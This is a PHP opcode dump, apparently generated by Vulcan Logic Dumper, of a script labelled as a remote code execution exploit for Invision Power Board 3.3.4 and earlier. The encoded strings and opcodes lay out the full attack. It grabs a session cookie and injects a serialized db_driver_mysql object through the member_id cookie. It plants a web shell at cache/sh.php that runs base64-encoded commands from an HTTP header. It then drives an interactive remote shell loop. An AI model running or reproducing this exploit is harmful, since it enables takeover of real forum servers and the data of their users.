Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 31
Branch analysis from position: 15
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 31
2 jumps found. (Code = 43) Position 1 = 59, Position 2 = 62
Branch analysis from position: 59
1 jumps found. (Code = 42) Position 1 = 63
Branch analysis from position: 63
2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 116
Branch analysis from position: 115
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 116
1 jumps found. (Code = 42) Position 1 = 154
Branch analysis from position: 154
2 jumps found. (Code = 44) Position 1 = 155, Position 2 = 117
Branch analysis from position: 155
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 117
2 jumps found. (Code = 43) Position 1 = 128, Position 2 = 129
Branch analysis from position: 128
1 jumps found. (Code = 42) Position 1 = 155
Branch analysis from position: 155
Branch analysis from position: 129
2 jumps found. (Code = 43) Position 1 = 147, Position 2 = 151
Branch analysis from position: 147
1 jumps found. (Code = 42) Position 1 = 153
Branch analysis from position: 153
2 jumps found. (Code = 44) Position 1 = 155, Position 2 = 117
Branch analysis from position: 155
Branch analysis from position: 117
Branch analysis from position: 151
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 62
2 jumps found. (Code = 43) Position 1 = 115, Position 2 = 116
Branch analysis from position: 115
Branch analysis from position: 116
filename: /in/0icii
function name: (null)
number of ops: 156
compiled vars: !0 = $argc, !1 = $argv, !2 = $host, !3 = $path, !4 = $packet, !5 = $_prefix, !6 = $m, !7 = $payload, !8 = $phpcode, !9 = $cmd, !10 = $response
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
54 0 E > INIT_FCALL 'error_reporting'
1 SEND_VAL 0
2 DO_ICALL
55 3 INIT_FCALL 'set_time_limit'
4 SEND_VAL 0
5 DO_ICALL
56 6 INIT_FCALL 'ini_set'
7 SEND_VAL 'default_socket_timeout'
8 SEND_VAL 5
9 DO_ICALL
65 10 ECHO '%0A%2B---------------------------------------------------------------------%2B'
66 11 ECHO '%0A%7C+Invision+Power+Board+%3C%3D+3.3.4+Remote+Code+Execution+Exploit+by+EgiX+%7C'
67 12 ECHO '%0A%2B---------------------------------------------------------------------%2B%0A'
69 13 IS_SMALLER !0, 3
14 > JMPZ ~14, ->31
71 15 > ROPE_INIT 3 ~17 '%0AUsage......%3A+php+'
16 FETCH_DIM_R ~15 !1, 0
17 ROPE_ADD 1 ~17 ~17, ~15
18 ROPE_END 2 ~16 ~17, '+%3Chost%3E+%3Cpath%3E%0A'
19 ECHO ~16
72 20 ROPE_INIT 3 ~21 '%0AExample....%3A+php+'
21 FETCH_DIM_R ~19 !1, 0
22 ROPE_ADD 1 ~21 ~21, ~19
23 ROPE_END 2 ~20 ~21, '+localhost+%2F'
24 ECHO ~20
73 25 ROPE_INIT 3 ~25 '%0AExample....%3A+php+'
26 FETCH_DIM_R ~23 !1, 0
27 ROPE_ADD 1 ~25 ~25, ~23
28 ROPE_END 2 ~24 ~25, '+localhost+%2Fipb%2F%0A'
29 ECHO ~24
74 30 > EXIT
77 31 > FETCH_DIM_R ~27 !1, 1
32 INIT_ARRAY ~28 ~27
33 FETCH_DIM_R ~29 !1, 2
34 ADD_ARRAY_ELEMENT ~28 ~29
35 FETCH_LIST_R $30 ~28, 0
36 ASSIGN !2, $30
37 FETCH_LIST_R $32 ~28, 1
38 ASSIGN !3, $32
39 FREE ~28
79 40 ROPE_INIT 3 ~35 'GET+'
41 ROPE_ADD 1 ~35 ~35, !3
42 ROPE_END 2 ~34 ~35, 'index.php+HTTP%2F1.0%0D%0A'
43 ASSIGN !4, ~34
80 44 ROPE_INIT 3 ~39 'Host%3A+'
45 ROPE_ADD 1 ~39 ~39, !2
46 ROPE_END 2 ~38 ~39, '%0D%0A'
47 ASSIGN_OP 8 !4, ~38
81 48 ASSIGN_OP 8 !4, 'Connection%3A+close%0D%0A%0D%0A'
83 49 INIT_FCALL 'preg_match'
50 SEND_VAL '%2FCookie%3A+%28.%2B%29session%2F'
51 INIT_FCALL 'http_send'
52 SEND_VAR !2
53 SEND_VAR !4
54 DO_FCALL 0 $43
55 SEND_VAR $43
56 SEND_REF !6
57 DO_ICALL $44
58 > JMPZ $44, ->62
59 > FETCH_DIM_R ~45 !6, 1
60 QM_ASSIGN ~46 ~45
61 > JMP ->63
62 > QM_ASSIGN ~46 ''
63 > ASSIGN !5, ~46
90 64 INIT_FCALL 'urlencode'
65 INIT_FCALL 'serialize'
66 NEW $48 'db_driver_mysql'
67 DO_FCALL 0
68 INIT_ARRAY ~50 $48
69 SEND_VAL ~50
70 DO_ICALL $51
71 SEND_VAR $51
72 DO_ICALL $52
73 ASSIGN !7, $52
91 74 ASSIGN !8, '%3C%3Ferror_reporting%280%29%3Bprint%28___%29%3Bpassthru%28base64_decode%28%24_SERVER%5BHTTP_CMD%5D%29%29%3Bdie%3B%3F%3E'
93 75 ROPE_INIT 5 ~56 'GET+'
76 ROPE_ADD 1 ~56 ~56, !3
77 ROPE_ADD 2 ~56 ~56, 'index.php%3F'
78 ROPE_ADD 3 ~56 ~56, !8
79 ROPE_END 4 ~55 ~56, '+HTTP%2F1.0%0D%0A'
80 ASSIGN !4, ~55
94 81 ROPE_INIT 3 ~61 'Host%3A+'
82 ROPE_ADD 1 ~61 ~61, !2
83 ROPE_END 2 ~60 ~61, '%0D%0A'
84 ASSIGN_OP 8 !4, ~60
95 85 ROPE_INIT 5 ~65 'Cookie%3A+'
86 ROPE_ADD 1 ~65 ~65, !5
87 ROPE_ADD 2 ~65 ~65, 'member_id%3D'
88 ROPE_ADD 3 ~65 ~65, !7
89 ROPE_END 4 ~64 ~65, '%0D%0A'
90 ASSIGN_OP 8 !4, ~64
96 91 ASSIGN_OP 8 !4, 'Connection%3A+close%0D%0A%0D%0A'
98 92 INIT_FCALL 'http_send'
93 SEND_VAR !2
94 SEND_VAR !4
95 DO_FCALL 0
100 96 ROPE_INIT 3 ~72 'GET+'
97 ROPE_ADD 1 ~72 ~72, !3
98 ROPE_END 2 ~71 ~72, 'cache%2Fsh.php+HTTP%2F1.0%0D%0A'
99 ASSIGN !4, ~71
101 100 ROPE_INIT 3 ~76 'Host%3A+'
101 ROPE_ADD 1 ~76 ~76, !2
102 ROPE_END 2 ~75 ~76, '%0D%0A'
103 ASSIGN_OP 8 !4, ~75
102 104 ASSIGN_OP 8 !4, 'Cmd%3A+%25s%0D%0A'
103 105 ASSIGN_OP 8 !4, 'Connection%3A+close%0D%0A%0D%0A'
105 106 INIT_FCALL 'preg_match'
107 SEND_VAL '%2F%3C%5C%3Ferror%2F'
108 INIT_FCALL 'http_send'
109 SEND_VAR !2
110 SEND_VAR !4
111 DO_FCALL 0 $81
112 SEND_VAR $81
113 DO_ICALL $82
114 > JMPZ $82, ->116
115 > > EXIT '%0A%5B-%5D+short_open_tag+disabled%21%0A'
107 116 > > JMP ->154
109 117 > ECHO '%0Aipb-shell%23+'
110 118 INIT_FCALL 'trim'
119 INIT_FCALL 'fgets'
120 FETCH_CONSTANT ~83 'STDIN'
121 SEND_VAL ~83
122 DO_ICALL $84
123 SEND_VAR $84
124 DO_ICALL $85
125 ASSIGN ~86 !9, $85
126 IS_EQUAL ~86, 'exit'
127 > JMPZ ~87, ->129
128 > > JMP ->155
111 129 > INIT_FCALL 'http_send'
130 SEND_VAR !2
131 INIT_FCALL 'sprintf'
132 SEND_VAR !4
133 INIT_FCALL 'base64_encode'
134 SEND_VAR !9
135 DO_ICALL $88
136 SEND_VAR $88
137 DO_ICALL $89
138 SEND_VAR $89
139 DO_FCALL 0 $90
140 ASSIGN !10, $90
112 141 INIT_FCALL 'preg_match'
142 SEND_VAL '%2F___%28.%2A%29%2Fs'
143 SEND_VAR !10
144 SEND_REF !6
145 DO_ICALL $92
146 > JMPZ $92, ->151
147 > FETCH_DIM_R ~93 !6, 1
148 ECHO ~93
149 QM_ASSIGN ~94 1
150 > JMP ->153
151 > > EXIT '%0A%5B-%5D+Exploit+failed%21%0A'
152* QM_ASSIGN ~94 <true>
153 > FREE ~94
107 154 > > JMPNZ 1, ->117
150 155 > > RETURN 1
Function http_send:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 9, Position 2 = 13
Branch analysis from position: 9
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 13
1 jumps found. (Code = 62) Position 1 = -2
filename: /in/0icii
function name: http_send
number of ops: 22
compiled vars: !0 = $host, !1 = $packet, !2 = $sock
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
58 0 E > RECV !0
1 RECV !1
60 2 INIT_FCALL 'fsockopen'
3 SEND_VAR !0
4 SEND_VAL 80
5 DO_ICALL $3
6 ASSIGN ~4 !2, $3
7 BOOL_NOT ~5 ~4
8 > JMPZ ~5, ->13
9 > ROPE_INIT 3 ~7 '%0A%5B-%5D+No+response+from+'
10 ROPE_ADD 1 ~7 ~7, !0
11 ROPE_END 2 ~6 ~7, '%3A80%0A'
12 > EXIT ~6
61 13 > INIT_FCALL 'fputs'
14 SEND_VAR !2
15 SEND_VAR !1
16 DO_ICALL
62 17 INIT_FCALL 'stream_get_contents'
18 SEND_VAR !2
19 DO_ICALL $10
20 > RETURN $10
63 21* > RETURN null
End of function http_send
Class db_driver_mysql: [no user functions]
Generated using Vulcan Logic Dumper, using php 8.0.0